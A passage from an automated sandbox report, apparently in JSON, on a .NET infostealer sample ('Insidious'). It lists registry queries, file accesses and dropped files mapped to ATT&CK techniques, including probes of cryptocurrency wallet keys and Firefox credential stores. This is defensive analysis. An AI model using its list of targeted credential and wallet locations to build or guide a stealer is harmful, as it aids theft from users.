\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA-ES\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA-ES\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-HANS\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-HANS\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-CN\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-CN\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS-CZ\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS-CZ\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" was detected as \".NET\" and name: \"Library\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenBaseKey\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"LoadLibrary\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"\n Observed API \"GetProcAddress\" in \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe.config\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Insidious\\\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.INI\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\bytecoin\\\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Zcash\\\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Users\\Public\\g4h7miqt.default\\logins.json\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\mscorlib.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\mscorlib.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.PDB\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Insidious.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\Insidious.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" trying to access non-existent file \"C:\\CC7D38CDC5F43A9A157D4C71445A4F4BD46D47E4221113886A9E8D2B50C76229.EXE.CONFIG\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\mozilla\\firefox\\profiles\\g4h7miqt.default\\places.sqlite\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\tmpd123.tmp.tmpdb\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD1C0.tmp.dat\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD460.tmp.dat\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\tmpD471.tmp.dat\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"C:\\Users\\Public\\g4h7miqt.default\\key3.db\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"%TEMP%\\tmpD1C0.tmp.dat\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"%TEMP%\\tmpD460.tmp.dat\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"%PUBLIC%\\g4h7miqt.default\\key3.db\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" writes a file \"%TEMP%\\tmpD471.tmp.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"tmpD52D.tmp.tmpdb\" has type \"SQLite 3.x database user version 8 last written using SQLite version 3020001 page size 32768 writer version 2 read version 2 file counter 4 database pages 4 cookie 0x2 schema 4 UTF-8 version-valid-for 4\"- Location: [%TEMP%\\tmpD52D.tmp.tmpdb]- [targetUID: 00000000-00005916]\n \"tmpD1C0.tmp.dat\" has type \"SQLite 3.x database last written using SQLite version 3039004 page size 2048 file counter 2 database pages 50 cookie 0x22 schema 4 UTF-8 version-valid-for 2\"- Location: [%TEMP%\\tmpD1C0.tmp.dat]- [targetUID: 00000000-00005916]\n \"tmpD460.tmp.dat\" has type \"SQLite 3.x database last written using SQLite version 3039004 page size 2048 file counter 1 database pages 23 cookie 0xd schema 4 UTF-8 version-valid-for 1\"- Location: [%TEMP%\\tmpD460.tmp.dat]- [targetUID: 00000000-00005916]\n \"key3.db\" has type \"Berkeley DB 1.85 (Hash version 2 native byte-order)\"- Location: [%PUBLIC%\\g4h7miqt.default\\key3.db]- [targetUID: 00000000-00005916]\n \"Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt\" has type \"ASCII text\"- Location: [%ALLUSERSPROFILE%\\44\\Files\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt]- [targetUID: 00000000-00005916]\n \"tmpD471.tmp.dat\" has type \"SQLite 3.x database last written using SQLite version 3039004 page size 2048 file counter 2 database pages 50 cookie 0x22 schema 4 UTF-8 version-valid-for 2\"- Location: [%TEMP%\\tmpD471.tmp.dat]- [targetUID: 00000000-00005916]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BITCOIN\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\DASH\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\LITECOIN\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MONERO-PROJECT\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\V4.0_POLICY.4.0.SYSTEM.CONFIGURATION__B03F5F7F11D50A3A\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\POLICY.4.0.SYSTEM.CONFIGURATION__B03F5F7F11D50A3A\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\V4.0_POLICY.4.0.SYSTEM.SECURITY__B03F5F7F11D50A3A\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\POLICY.4.0.SYSTEM.SECURITY__B03F5F7F11D50A3A\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\V4.0_POLICY.4.0.SYSTEM.CORE__B77A5C561934E089\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\POLICY.4.0.SYSTEM.CORE__B77A5C561934E089\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\V4.0_POLICY.4.0.SYSTEM.NUMERICS__B77A5C561934E089\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\POLICY.4.0.SYSTEM.NUMERICS__B77A5C561934E089\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\XML\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\XML\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\\SYSTEM.NET.SERVICEPOINTMANAGER.USEHTTPPIPELININGANDBUFFERPOOLING\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\\SYSTEM.NET.SERVICEPOINTMANAGER.USESAFESYNCHRONOUSCLOSE\"; Key: \"\"; Value: \"\")\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\V4.0.30319\\SYSTEM.NET.SERVICEPOINTMANAGER.USESTRICTRFCINTERIMRESPONSEHANDLING\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\mscorlib.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\mscorlib.pdb\"\n \"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" touched file \"C:\\Windows\\Insidious.pdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" queries basic process information of the \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll\" (UID: 5916)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: 